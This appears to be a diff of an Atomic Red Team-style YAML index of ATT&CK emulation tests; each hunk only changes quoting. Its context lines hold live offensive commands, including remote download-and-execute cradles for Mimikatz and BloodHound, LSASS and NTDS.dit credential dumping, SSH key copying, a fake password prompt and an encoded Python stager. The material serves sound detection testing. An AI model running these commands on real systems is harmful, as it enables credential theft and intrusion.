T1040:
technique:
x_mitre_data_sources:
@@ -18010,7 +18010,7 @@ discovery:
description: 'Perform a PCAP. Wireshark will be required for tshark. TCPdump
may already be installed.
'
'
supported_platforms:
- linux
input_arguments:
@@ -18028,7 +18028,7 @@ discovery:
description: 'Perform a PCAP on MacOS. This will require Wireshark/tshark to
be installed. TCPdump may already be installed.
'
'
supported_platforms:
- macos
input_arguments:
@@ -18139,19 +18139,19 @@ discovery:
- name: Examine password complexity policy - Ubuntu
description: 'Lists the password complexity policy to console on Ubuntu Linux.
'
'
supported_platforms:
- linux
executor:
name: bash
command: 'cat /etc/pam.d/common-password
'
'
- name: Examine password complexity policy - CentOS/RHEL 7.x
description: 'Lists the password complexity policy to console on CentOS/RHEL
7.x Linux.
'
'
supported_platforms:
- linux
dependencies:
@@ -18163,12 +18163,12 @@ discovery:
name: bash
command: 'cat /etc/security/pwquality.conf
'
'
- name: Examine password complexity policy - CentOS/RHEL 6.x
description: 'Lists the password complexity policy to console on CentOS/RHEL
6.x Linux.
'
'
supported_platforms:
- linux
dependencies:
@@ -18184,18 +18184,18 @@ discovery:
- name: Examine password expiration policy - All Linux
description: 'Lists the password expiration policy to console on CentOS/RHEL/Ubuntu.
'
'
supported_platforms:
- linux
executor:
name: bash
command: 'cat /etc/login.defs
'
'
- name: Examine local password policy - Windows
description: 'Lists the local password policy to console on Windows.
'
'
supported_platforms:
- windows
executor:
@@ -18203,11 +18203,11 @@ discovery:
elevation_required: false
command: 'net accounts
'
'
- name: Examine domain password policy - Windows
description: 'Lists the domain password policy to console on Windows.
'
'
supported_platforms:
- windows
executor:
@@ -18215,11 +18215,11 @@ discovery:
elevation_required: false
command: 'net accounts /domain
'
'
- name: Examine password policy - macOS
description: 'Lists the password policy to console on macOS.
'
'
supported_platforms:
- macos
executor:
@@ -18301,7 +18301,7 @@ discovery:
- name: Permission Groups Discovery
description: 'Permission Groups Discovery
'
'
supported_platforms:
- macos
- linux
@@ -18314,7 +18314,7 @@ discovery:
- name: Basic Permission Groups Discovery Windows
description: 'Basic Permission Groups Discovery for Windows
'
'
supported_platforms:
- windows
executor:
@@ -18327,7 +18327,7 @@ discovery:
- name: Permission Groups Discovery PowerShell
description: 'Permission Groups Discovery utilizing PowerShell
'
'
supported_platforms:
- windows
input_arguments:
@@ -18345,7 +18345,7 @@ discovery:
description: 'Runs "net group" command including command aliases and loose typing
to simulate enumeration/discovery of high value domain groups
'
'
supported_platforms:
- windows
executor:
@@ -18409,7 +18409,7 @@ discovery:
- name: Process Discovery - ps
description: 'Utilize ps to identify processes
'
'
supported_platforms:
- macos
- linux
@@ -18427,7 +18427,7 @@ discovery:
- name: Process Discovery - tasklist
description: 'Utilize tasklist to identify processes
'
'
supported_platforms:
- windows
executor:
@@ -18435,7 +18435,7 @@ discovery:
elevation_required: false
command: 'tasklist
'
'
T1012:
technique:
x_mitre_data_sources:
@@ -18598,7 +18598,7 @@ discovery:
- name: Remote System Discovery - net
description: 'Identify remote systems with net.exe
'
'
supported_platforms:
- windows
executor:
@@ -18611,7 +18611,7 @@ discovery:
description: 'Identify remote systems with net.exe querying the Active Directory
Domain Computers group.
'
'
supported_platforms:
- windows
executor:
@@ -18619,11 +18619,11 @@ discovery:
elevation_required: false
command: 'net group "Domain Computers" /domain
'
'
- name: Remote System Discovery - nltest
description: 'Identify domain controllers for specified domain.
'
'
supported_platforms:
- windows
input_arguments:
@@ -18636,11 +18636,11 @@ discovery:
elevation_required: false
command: 'nltest.exe /dclist:#{target_domain}
'
'
- name: Remote System Discovery - ping sweep
description: 'Identify remote systems via ping sweep
'
'
supported_platforms:
- windows
executor:
@@ -18648,11 +18648,11 @@ discovery:
elevation_required: false
command: 'for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i
'
'
- name: Remote System Discovery - arp
description: 'Identify remote systems via arp
'
'
supported_platforms:
- windows
executor:
@@ -18660,11 +18660,11 @@ discovery:
elevation_required: false
command: 'arp -a
'
'
- name: Remote System Discovery - arp nix
description: 'Identify remote systems via arp
'
'
supported_platforms:
- linux
- macos
@@ -18673,11 +18673,11 @@ discovery:
elevation_required: false
command: 'arp -a | grep -v ''^?''
'
'
- name: Remote System Discovery - sweep
description: 'Identify remote systems via ping sweep
'
'
supported_platforms:
- linux
- macos
@@ -18687,12 +18687,12 @@ discovery:
command: 'for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip; [ $? -eq 0 ]
&& echo "192.168.1.$ip UP" || : ; done
'
'
- name: Remote System Discovery - nslookup
description: 'Powershell script that runs nslookup on cmd.exe against the local
/24 network of the first network adaptor listed in ipconfig
'
'
supported_platforms:
- windows
executor:
@@ -18754,7 +18754,7 @@ discovery:
- name: Security Software Discovery
description: 'Methods to identify Security Software on an endpoint
'
'
supported_platforms:
- windows
executor:
@@ -18770,7 +18770,7 @@ discovery:
- name: Security Software Discovery - powershell
description: 'Methods to identify Security Software on an endpoint
'
'
supported_platforms:
- windows
executor:
@@ -18784,7 +18784,7 @@ discovery:
- name: Security Software Discovery - ps
description: 'Methods to identify Security Software on an endpoint
'
'
supported_platforms:
- linux
- macos
@@ -18798,7 +18798,7 @@ discovery:
description: 'Discovery of an installed Sysinternals Sysmon service using driver
altitude (even if the name is changed).
'
'
supported_platforms:
- windows
executor:
@@ -18806,11 +18806,11 @@ discovery:
elevation_required: true
command: 'fltmc.exe | findstr.exe 385201
'
'
- name: Security Software Discovery - AV Discovery via WMI
description: 'Discovery of installed antivirus products via a WMI query.
'
'
supported_platforms:
- windows
executor:
@@ -18863,7 +18863,7 @@ discovery:
software that is installed on the system. Adversaries may use the information
from Software Discovery during automated discovery to shape follow-on behaviors
'
'
supported_platforms:
- windows
executor:
@@ -18872,13 +18872,13 @@ discovery:
command: 'reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer"
/v svcVersion
'
'
- name: Applications Installed
description: 'Adversaries may attempt to get a listing of all software that
is installed on the system. Adversaries may use the information from Software
Discovery during automated discovery to shape follow-on behaviors
'
'
supported_platforms:
- windows
executor:
@@ -18970,7 +18970,7 @@ discovery:
- name: System Information Discovery
description: 'Identify System Info
'
'
supported_platforms:
- windows
executor:
@@ -18982,7 +18982,7 @@ discovery:
- name: System Information Discovery
description: 'Identify System Info
'
'
supported_platforms:
- linux
- macos
@@ -18995,7 +18995,7 @@ discovery:
- name: List OS Information
description: 'Identify System Info
'
'
supported_platforms:
- linux
- macos
@@ -19011,7 +19011,7 @@ discovery:
description: 'Identify virtual machine hardware. This technique is used by the
Pupy RAT and other malware.
'
'
supported_platforms:
- linux
executor:
@@ -19029,7 +19029,7 @@ discovery:
description: 'Identify virtual machine guest kernel modules. This technique
is used by the Pupy RAT and other malware.
'
'
supported_platforms:
- linux
executor:
@@ -19043,7 +19043,7 @@ discovery:
- name: Hostname Discovery (Windows)
description: 'Identify system hostname for Windows.
'
'
supported_platforms:
- windows
executor:
@@ -19051,11 +19051,11 @@ discovery:
elevation_required: false
command: 'hostname
'
'
- name: Hostname Discovery
description: 'Identify system hostname for Linux and macOS systems.
'
'
supported_platforms:
- linux
- macos
@@ -19064,11 +19064,11 @@ discovery:
elevation_required: false
command: 'hostname
'
'
- name: Windows MachineGUID Discovery
description: 'Identify the Windows MachineGUID value for a system.
'
'
supported_platforms:
- windows
executor:
@@ -19077,7 +19077,7 @@ discovery:
command: 'REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v
MachineGuid
'
'
T1016:
technique:
x_mitre_data_sources:
@@ -19121,7 +19121,7 @@ discovery:
- name: System Network Configuration Discovery
description: 'Identify network configuration information
'
'
supported_platforms:
- windows
executor:
@@ -19136,7 +19136,7 @@ discovery:
- name: List Windows Firewall Rules
description: 'Enumerates Windows Firewall Rules using netsh.
'
'
supported_platforms:
- windows
executor:
@@ -19144,11 +19144,11 @@ discovery:
elevation_required: false
command: 'netsh advfirewall firewall show rule name=all
'
'
- name: System Network Configuration Discovery
description: 'Identify network configuration information
'
'
supported_platforms:
- macos
- linux
@@ -19163,7 +19163,7 @@ discovery:
description: 'Identify network configuration information as seen by Trickbot
and described here https://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/
'
'
supported_platforms:
- windows
executor:
@@ -19287,7 +19287,7 @@ discovery:
- name: System Network Connections Discovery
description: 'Get a listing of network connections.
'
'
supported_platforms:
- windows
executor:
@@ -19300,7 +19300,7 @@ discovery:
- name: System Network Connections Discovery with PowerShell
description: 'Get a listing of network connections.
'
'
supported_platforms:
- windows
executor:
@@ -19308,11 +19308,11 @@ discovery:
elevation_required: false
command: 'Get-NetTCPConnection
'
'
- name: System Network Connections Discovery Linux & MacOS
description: 'Get a listing of network connections.
'
'
supported_platforms:
- linux
- macos
@@ -19375,7 +19375,7 @@ discovery:
- name: System Owner/User Discovery
description: 'Identify System owner or users on an endpoint
'
'
supported_platforms:
- windows
input_arguments:
@@ -19398,7 +19398,7 @@ discovery:
- name: System Owner/User Discovery
description: 'Identify System owner or users on an endpoint
'
'
supported_platforms:
- linux
- macos
@@ -19456,7 +19456,7 @@ discovery:
- name: System Service Discovery
description: 'Identify system services
'
'
supported_platforms:
- windows
executor:
@@ -19470,7 +19470,7 @@ discovery:
description: 'Enumerates started system services using net.exe and writes them
to a file. This technique has been used by multiple threat actors.
'
'
supported_platforms:
- windows
input_arguments:
@@ -19483,10 +19483,10 @@ discovery:
elevation_required: false
command: 'net.exe start >> #{output_file}
'
'
cleanup_command: 'del /f /q /s #{output_file} >nul 2>&1
'
'
T1124:
technique:
x_mitre_data_sources:
@@ -19541,7 +19541,7 @@ discovery:
- name: System Time Discovery
description: 'Identify the system time
'
'
supported_platforms:
- windows
input_arguments:
@@ -19558,7 +19558,7 @@ discovery:
- name: System Time Discovery - PowerShell
description: 'Identify the system time via PowerShell
'
'
supported_platforms:
- windows
executor:
@@ -19566,7 +19566,7 @@ discovery:
elevation_required: false
command: 'Get-Date
'
'
credential-access:
T1098:
technique:
@@ -19664,7 +19664,7 @@ credential-access:
- name: Admin Account Manipulate
description: 'Manipulate Admin Account Name
'
'
supported_platforms:
- windows
executor:
@@ -19736,7 +19736,7 @@ credential-access:
description: 'Search through bash history for specifice commands we want to
capture
'
'
supported_platforms:
- linux
- macos
@@ -19759,7 +19759,7 @@ credential-access:
command: 'cat #{bash_history_filename} | grep #{bash_history_grep_args} >
#{output_file}
'
'
T1110:
technique:
x_mitre_permissions_required:
@@ -19862,7 +19862,7 @@ credential-access:
description: 'Creates username and password files then attempts to brute force
on remote host
'
'
supported_platforms:
- windows
input_arguments:
@@ -20223,7 +20223,7 @@ credential-access:
description: 'Dumps credentials from memory via Powershell by invoking a remote
mimikatz script
'
'
supported_platforms:
- windows
input_arguments:
@@ -20237,11 +20237,11 @@ credential-access:
command: 'IEX (New-Object Net.WebClient).DownloadString(''#{remote_script}'');
Invoke-Mimikatz -DumpCreds
'
'
- name: Gsecdump
description: 'Dump credentials from memory using Gsecdump
'
'
supported_platforms:
- windows
input_arguments:
@@ -20275,7 +20275,7 @@ credential-access:
description: 'Dump credentials from memory using Windows Credential Editor from
https://www.ampliasecurity.com/research/windows-credentials-editor/
'
'
supported_platforms:
- windows
input_arguments:
@@ -20360,7 +20360,7 @@ credential-access:
command: "#{procdump_exe} -accepteula -ma lsass.exe #{output_file}\n"
cleanup_command: 'del "#{output_file}" >nul 2> nul
'
'
- name: Dump LSASS.exe Memory using Windows Task Manager
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
@@ -20414,7 +20414,7 @@ credential-access:
command: '#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords
full" exit
'
'
- name: Dump Active Directory Database with NTDSUtil
description: |
The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability
@@ -20438,12 +20438,12 @@ credential-access:
elevation_required: true
command: 'ntdsutil "ac i ntds" "ifm" "create full #{output_folder}" q q
'
'
- name: Create Volume Shadow Copy with NTDS.dit
description: 'The Active Directory database NTDS.dit may be dumped by copying
it from a Volume Shadow Copy.
'
'
supported_platforms:
- windows
input_arguments:
@@ -20462,7 +20462,7 @@ credential-access:
elevation_required: true
command: 'vssadmin.exe create shadow /for=#{drive_letter}
'
'
- name: Copy NTDS.dit from Volume Shadow Copy
description: "The Active Directory database NTDS.dit may be dumped by copying
it from a Volume Shadow Copy.\n\nThis test requires steps taken in the test
@@ -20509,7 +20509,7 @@ credential-access:
files on the Domain Controller. This value can be decrypted with gpp-decrypt
on Kali Linux.
'
'
supported_platforms:
- windows
dependency_executor_name: powershell
@@ -20524,12 +20524,12 @@ credential-access:
elevation_required: false
command: 'findstr /S cpassword %logonserver%\sysvol\*.xml
'
'
- name: GPP Passwords (Get-GPPPassword)
description: 'Look for the encrypted cpassword value within Group Policy Preference
files on the Domain Controller.
'
'
supported_platforms:
- windows
input_arguments:
@@ -20581,11 +20581,11 @@ credential-access:
elevation_required: true
command: 'pypykatz live lsa
'
'
- name: Registry parse with pypykatz
description: 'Parses registry hives to obtain stored credentials
'
'
supported_platforms:
- windows
dependency_executor_name: powershell
@@ -20604,7 +20604,7 @@ credential-access:
elevation_required: true
command: 'pypykatz live registry
'
'
T1081:
technique:
x_mitre_permissions_required:
@@ -20680,11 +20680,11 @@ credential-access:
name: sh
command: 'python2 laZagne.py all
'
'
- name: Extract passwords with grep
description: 'Extracting credentials from files
'
'
input_arguments:
file_path:
description: Path to search
@@ -20697,11 +20697,11 @@ credential-access:
name: sh
command: 'grep -ri password #{file_path}
'
'
- name: Extracting passwords with findstr
description: 'Extracting Credentials from Files
'
'
supported_platforms:
- windows
executor:
@@ -20714,7 +20714,7 @@ credential-access:
description: 'Attempts to access unattend.xml, where credentials are commonly
stored, within the Panther directory where installation logs are stored.
'
'
supported_platforms:
- windows
executor:
@@ -20777,7 +20777,7 @@ credential-access:
- name: Enumeration for Credentials in Registry
description: 'Queries to enumerate for credentials in the Registry.
'
'
supported_platforms:
- windows
executor:
@@ -20789,7 +20789,7 @@ credential-access:
- name: Enumeration for PuTTY Credentials in Registry
description: 'Queries to enumerate for PuTTY credentials in the Registry.
'
'
supported_platforms:
- windows
executor:
@@ -20797,7 +20797,7 @@ credential-access:
elevation_required: false
command: 'reg query HKCU\Software\SimonTatham\PuTTY\Sessions /t REG_SZ /s
'
'
T1179:
technique:
x_mitre_data_sources:
@@ -20927,7 +20927,7 @@ credential-access:
- name: Hook PowerShell TLS Encrypt/Decrypt Messages
description: 'Hooks functions in PowerShell to read TLS Communications
'
'
supported_platforms:
- windows
input_arguments:
@@ -21035,7 +21035,7 @@ credential-access:
.\T1056\src\Get-Keystrokes.ps1 -LogPath #{filepath}
cleanup_command: 'Remove-Item $env:TEMP\key.log -ErrorAction Ignore
'
'
T1141:
technique:
x_mitre_data_sources:
@@ -21109,7 +21109,7 @@ credential-access:
to apply changes." & return & return default answer "" with icon 1 with
hidden answer with title "Software Update"''
'
'
- name: PowerShell - Prompt User for Password
description: |
Prompt User for Password (Local Phishing) as seen in Stitch RAT.
@@ -21334,7 +21334,7 @@ credential-access:
description: 'Perform a PCAP. Wireshark will be required for tshark. TCPdump
may already be installed.
'
'
supported_platforms:
- linux
input_arguments:
@@ -21352,7 +21352,7 @@ credential-access:
description: 'Perform a PCAP on MacOS. This will require Wireshark/tshark to
be installed. TCPdump may already be installed.
'
'
supported_platforms:
- macos
input_arguments:
@@ -21455,7 +21455,7 @@ credential-access:
description: 'Uses PowerShell to install and register a password filter DLL.
Requires a reboot and administrative privileges.
'
'
supported_platforms:
- windows
input_arguments:
@@ -21549,11 +21549,11 @@ credential-access:
dir c:\ /b /s .key | findstr /e .key
cleanup_command: 'del c:\Windows\cert.key >nul 2>&1
'
'
- name: Discover Private SSH Keys
description: 'Discover private SSH keys on a macOS or Linux system.
'
'
supported_platforms:
- macos
- linux
@@ -21571,7 +21571,7 @@ credential-access:
description: 'Copy private SSH keys on a Linux system to a staging folder using
the `cp` command.
'
'
supported_platforms:
- linux
input_arguments:
@@ -21589,7 +21589,7 @@ credential-access:
description: 'Copy private SSH keys on a Linux or macOS system to a staging
folder using the `rsync` command.
'
'
supported_platforms:
- macos
- linux
@@ -21673,7 +21673,7 @@ execution:
command: 'osascript "do shell script "echo \"import sys,base64,warnings;warnings.filterwarnings(''ignore'');exec(base64.b64decode(''aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly8xMjcuMC4wLjE6ODAnO3Q9Jy9sb2dpbi9wcm9jZXNzLnBocCc7cmVxPXVybGxpYjIuUmVxdWVzdChzZXJ2ZXIrdCk7CnJlcS5hZGRfaGVhZGVyKCdVc2VyLUFnZW50JyxVQSk7CnJlcS5hZGRfaGVhZGVyKCdDb29raWUnLCJzZXNzaW9uPXQzVmhWT3MvRHlDY0RURnpJS2FuUnhrdmszST0iKTsKcHJveHkgPSB1cmxsaWIyLlByb3h5SGFuZGxlcigpOwpvID0gdXJsbGliMi5idWlsZF9vcGVuZXIocHJveHkpOwp1cmxsaWIyLmluc3RhbGxfb3BlbmVyKG8pOwphPXVybGxpYjIudXJsb3BlbihyZXEpLnJlYWQoKTsKSVY9YVswOjRdO2RhdGE9YVs0Ol07a2V5PUlWKyc4Yzk0OThmYjg1YmQ1MTE5ZGQ5ODQ4MTJlZTVlOTg5OSc7UyxqLG91dD1yYW5nZSgyNTYpLDAsW10KZm9yIGkgaW4gcmFuZ2UoMjU2KToKICAgIGo9KGorU1tpXStvcmQoa2V5W2klbGVuKGtleSldKSklMjU2CiAgICBTW2ldLFNbal09U1tqXSxTW2ldCmk9aj0wCmZvciBjaGFyIGluIGRhdGE6CiAgICBpPShpKzEpJTI1NgogICAgaj0oaitTW2ldKSUyNTYKICAgIFNbaV0sU1tqXT1TW2pdLFNbaV0KICAgIG91dC5hcHBlbmQoY2hyKG9yZChjaGFyKV5TWyhTW2ldK1Nbal0pJTI1Nl0pKQpleGVjKCcnLmpvaW4ob3V0KSkK''));\"
| python &""
'
'
T1191:
technique:
x_mitre_data_sources:
@@ -21753,7 +21753,7 @@ execution:
description: 'Adversaries may supply CMSTP.exe with INF files infected with
malicious commands
'
'
supported_platforms:
- windows
input_arguments:
@@ -21773,12 +21773,12 @@ execution:
elevation_required: false
command: 'cmstp.exe /s #{inf_file_path}
'
'
- name: CMSTP Executing UAC Bypass
description: 'Adversaries may invoke cmd.exe (or other malicious commands) by
embedding them in the RunPreSetupCommandsSection of an INF file
'
'
supported_platforms:
- windows
input_arguments:
@@ -21798,7 +21798,7 @@ execution:
elevation_required: false
command: 'cmstp.exe /s #{inf_file_uac} /au
'
'
T1059:
technique:
x_mitre_data_sources:
@@ -21923,7 +21923,7 @@ execution:
- name: Compiled HTML Help Local Payload
description: 'Uses hh.exe to execute a local compiled HTML Help payload.
'
'
supported_platforms:
- windows
input_arguments:
@@ -21943,11 +21943,11 @@ execution:
elevation_required: false
command: 'hh.exe #{local_chm_file}
'
'
- name: Compiled HTML Help Remote Payload
description: 'Uses hh.exe to execute a remote compiled HTML Help payload.
'
'
supported_platforms:
- windows
input_arguments:
@@ -21960,7 +21960,7 @@ execution:
elevation_required: false
command: 'hh.exe #{remote_chm_file}
'
'
'':
technique:
x_mitre_permissions_required:
@@ -22099,7 +22099,7 @@ execution:
description: 'This test simulates an adversary leveraging control.exe to execute
a payload and pops calc
'
'
supported_platforms:
- windows
input_arguments:
@@ -22119,7 +22119,7 @@ execution:
elevation_required: false
command: 'control.exe #{cpl_file_path}
'
'
T1173:
technique:
x_mitre_data_sources:
@@ -22199,7 +22199,7 @@ execution:
- name: Execute Commands
description: 'Executes commands via DDE using Microsfot Word
'
'
supported_platforms:
- windows
executor:
@@ -22221,7 +22221,7 @@ execution:
ok on a dialogue box, then attempt to run PowerShell with DDEAUTO to download
and execute a powershell script
'
'
supported_platforms:
- windows
executor:
@@ -22229,7 +22229,7 @@ execution:
elevation_required: false
command: 'start $PathToAtomicsFolder\T1173\bin\DDE_Document.docx
'
'
T1118:
technique:
x_mitre_data_sources:
@@ -22287,7 +22287,7 @@ execution:
description: 'Executes the CheckIfInstallable class constructor runner instead
of executing InstallUtil.
'
'
supported_platforms:
- windows
input_arguments:
@@ -22353,7 +22353,7 @@ execution:
description: 'Executes the InstallHelper class constructor runner instead of
executing InstallUtil.
'
'
supported_platforms:
- windows
input_arguments:
@@ -22420,7 +22420,7 @@ execution:
- name: InstallUtil class constructor method call
description: 'Executes the installer assembly class constructor.
'
'
supported_platforms:
- windows
input_arguments:
@@ -22487,7 +22487,7 @@ execution:
- name: InstallUtil Install method call
description: 'Executes the Install Method
'
'
supported_platforms:
- windows
input_arguments:
@@ -22554,7 +22554,7 @@ execution:
- name: InstallUtil Uninstall method call - /U variant
description: 'Executes the Uninstall Method
'
'
supported_platforms:
- windows
input_arguments:
@@ -22622,7 +22622,7 @@ execution:
variant
description: 'Executes the Uninstall Method
'
'
supported_platforms:
- windows
input_arguments:
@@ -22689,7 +22689,7 @@ execution:
- name: InstallUtil HelpText method call
description: 'Executes the Uninstall Method
'
'
supported_platforms:
- windows
input_arguments:
@@ -22757,7 +22757,7 @@ execution:
description: 'Executes an InstallUtil assembly by renaming InstallUtil.exe and
using a nonstandard extension for the assembly.
'
'
supported_platforms:
- windows
input_arguments:
@@ -22874,14 +22874,14 @@ execution:
- name: Launchctl
description: 'Utilize launchctl
'
'
supported_platforms:
- macos
executor:
name: sh
command: 'launchctl submit -l evil -- /Applications/Calculator.app/Contents/MacOS/Calculator
'
'
T1168:
technique:
x_mitre_data_sources:
@@ -22969,7 +22969,7 @@ execution:
of the referenced file. This technique was used by numerous IoT automated
exploitation attacks.
'
'
supported_platforms:
- macos
- linux
@@ -22986,13 +22986,13 @@ execution:
name: bash
command: 'echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
'
'
- name: Cron - Add script to cron folder
description: 'This test adds a script to a cron folder configured to execute
on a schedule. This technique was used by the threat actor Rocke during the
exploitation of Linux web servers.
'
'
supported_platforms:
- macos
- linux
@@ -23009,7 +23009,7 @@ execution:
name: bash
command: 'echo "#{command}" > /etc/cron.daily/#{cron_script_name}
'
'
- name: Event Monitor Daemon Persistence
description: "This test adds persistence via a plist to execute via the macOS
Event Monitor Daemon. \n"
@@ -23147,7 +23147,7 @@ execution:
- name: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject
description: 'Test execution of a remote script using mshta.exe
'
'
supported_platforms:
- windows
input_arguments:
@@ -23174,7 +23174,7 @@ execution:
name: command_prompt
command: 'mshta.exe vbscript:Execute("CreateObject(""Wscript.Shell"").Run(""{local_file_path}"")(window.close)")
'
'
- name: Mshta executes VBScript to execute malicious command
description: |
Run a local VB script to run local user enumeration powershell command
@@ -23187,11 +23187,11 @@ execution:
command: 'mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell
-noexit -file $PathToAtomicsFolder\T1170\src\powershell.ps1"":close")
'
'
- name: Mshta Executes Remote HTML Application (HTA)
description: 'Execute an arbitrary remote HTA.
'
'
supported_platforms:
- windows
input_arguments:
@@ -23211,7 +23211,7 @@ execution:
mshta "#{temp_file}"
cleanup_command: 'remove-item "#{temp_file}" -ErrorAction Ignore
'
'
T1086:
technique:
x_mitre_permissions_required:
@@ -23305,7 +23305,7 @@ execution:
- name: Mimikatz
description: 'Download Mimikatz and dump credentials
'
'
supported_platforms:
- windows
input_arguments:
@@ -23319,11 +23319,11 @@ execution:
command: 'powershell.exe "IEX (New-Object Net.WebClient).DownloadString(''#{mimurl}'');
Invoke-Mimikatz -DumpCreds"
'
'
- name: BloodHound
description: 'Download Bloodhound and run it
'
'
supported_platforms:
- windows
input_arguments:
@@ -23337,7 +23337,7 @@ execution:
command: 'powershell.exe "IEX (New-Object Net.WebClient).DownloadString(''#{bloodurl}'');
Invoke-BloodHound"
'
'
- name: Obfuscation Tests
description: |
Different obfuscated methods to test
@@ -23354,7 +23354,7 @@ execution:
- name: Mimikatz - Cradlecraft PsSendKeys
description: 'Run mimikatz via PsSendKeys
'
'
supported_platforms:
- windows
executor:
@@ -23385,11 +23385,11 @@ execution:
command: 'Powershell.exe "IEX (New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'');
Invoke-AppPathBypass -Payload ''C:\Windows\System32\cmd.exe''"
'
'
- name: PowerShell Add User
description: 'Using PS 5.1, add a user via CLI
'
'
supported_platforms:
- windows
input_arguments:
@@ -23415,7 +23415,7 @@ execution:
command: 'New-LocalUser -FullName ''#{full_name}'' -Name ''#{user_name}''
-Password #{password} -Description ''#{description}''
'
'
- name: Powershell MsXml COM object - no prompt
description: |
Provided by https://github.com/mgreen27/mgreen27.github.io
@@ -23435,7 +23435,7 @@ execution:
-ComObject MsXml2.ServerXmlHttp;$comMsXml.Open(''GET'',''#{url}'',$False);$comMsXml.Send();IEX
$comMsXml.ResponseText"
'
'
- name: Powershell MsXml COM object - with prompt
description: |
Provided by https://github.com/mgreen27/mgreen27.github.io
@@ -23455,7 +23455,7 @@ execution:
MsXml2.ServerXmlHttp;$comMsXml.Open(''GET'',''#{url}'',$False);$comMsXml.Send();IEX
$comMsXml.ResponseText"
'
'
- name: Powershell XML requests
description: |
Provided by https://github.com/mgreen27/mgreen27.github.io
@@ -23474,7 +23474,7 @@ execution:
bypass -windowstyle hidden -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load(''#{url}'');$Xml.command.a.execute
| IEX"
'
'
- name: Powershell invoke mshta.exe download
description: |
Provided by https://github.com/mgreen27/mgreen27.github.io
@@ -23491,7 +23491,7 @@ execution:
elevation_required: false
command: '"C:\Windows\system32\cmd.exe" /c "mshta.exe javascript:a=GetObject(''script:#{url}'').Exec();close()"
'
'
- name: Powershell Invoke-DownloadCradle
description: |
Provided by https://github.com/mgreen27/mgreen27.github.io
@@ -23507,7 +23507,7 @@ execution:
description: 'Execution of a PowerShell payload from the Windows Registry similar
to that seen in fileless malware infections.
'
'
supported_platforms:
- windows
executor:
@@ -23523,7 +23523,7 @@ execution:
- name: PowerShell Downgrade Attack
description: 'Attempts to run powershell commands in version 2.0 https://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/
'
'
supported_platforms:
- windows
dependencies:
@@ -23537,12 +23537,12 @@ execution:
elevation_required: false
command: 'powershell.exe -version 2 -Command Write-Host $PSVersion
'
'
- name: NTFS Alternate Data Stream Access
description: 'Creates a file with an alternate data stream and simulates executing
that hidden code/file
'
'
supported_platforms:
- windows
input_arguments:
@@ -23564,7 +23564,7 @@ execution:
Invoke-Expression $streamcommand
cleanup_command: 'Remove-Item #{ads_file} -Force -ErrorAction Ignore
'
'
T1121:
technique:
x_mitre_data_sources:
@@ -23628,7 +23628,7 @@ execution:
- name: Regasm Uninstall Method Call Test
description: 'Executes the Uninstall Method, No Admin Rights Required
'
'
supported_platforms:
- windows
input_arguments:
@@ -23656,12 +23656,12 @@ execution:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U #{output_file}
cleanup_command: 'del #{output_file} >nul 2>&1
'
'
- name: Regsvs Uninstall Method Call Test
description: 'Executes the Uninstall Method, No Admin Rights Required, Requires
SNK
'
'
supported_platforms:
- windows
input_arguments:
@@ -23769,7 +23769,7 @@ execution:
description: 'Regsvr32.exe is a command-line program used to register and unregister
OLE controls
'
'
supported_platforms:
- windows
input_arguments:
@@ -23789,12 +23789,12 @@ execution:
elevation_required: false
command: 'regsvr32.exe /s /u /i:#{filename} scrobj.dll
'
'
- name: Regsvr32 remote COM scriptlet execution
description: 'Regsvr32.exe is a command-line program used to register and unregister
OLE controls
'
'
supported_platforms:
- windows
input_arguments:
@@ -23807,12 +23807,12 @@ execution:
elevation_required: false
command: 'regsvr32.exe /s /u /i:#{url} scrobj.dll
'
'
- name: Regsvr32 local DLL execution
description: 'Regsvr32.exe is a command-line program used to register and unregister
OLE controls
'
'
supported_platforms:
- windows
input_arguments:
@@ -23834,7 +23834,7 @@ execution:
command: '"IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe
/s #{dll_name}) ELSE ( regsvr32.exe /s #{dll_name} )"
'
'
T1085:
technique:
x_mitre_data_sources:
@@ -23897,7 +23897,7 @@ execution:
- name: Rundll32 execute JavaScript Remote Payload With GetObject
description: 'Test execution of a remote script using rundll32.exe
'
'
supported_platforms:
- windows
input_arguments:
@@ -23910,7 +23910,7 @@ execution:
elevation_required: false
command: 'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();
'
'
- name: Rundll32 execute VBscript command
description: |
Test execution of a command using rundll32.exe and VBscript in a similar manner to the JavaScript test.
@@ -23928,7 +23928,7 @@ execution:
elevation_required: false
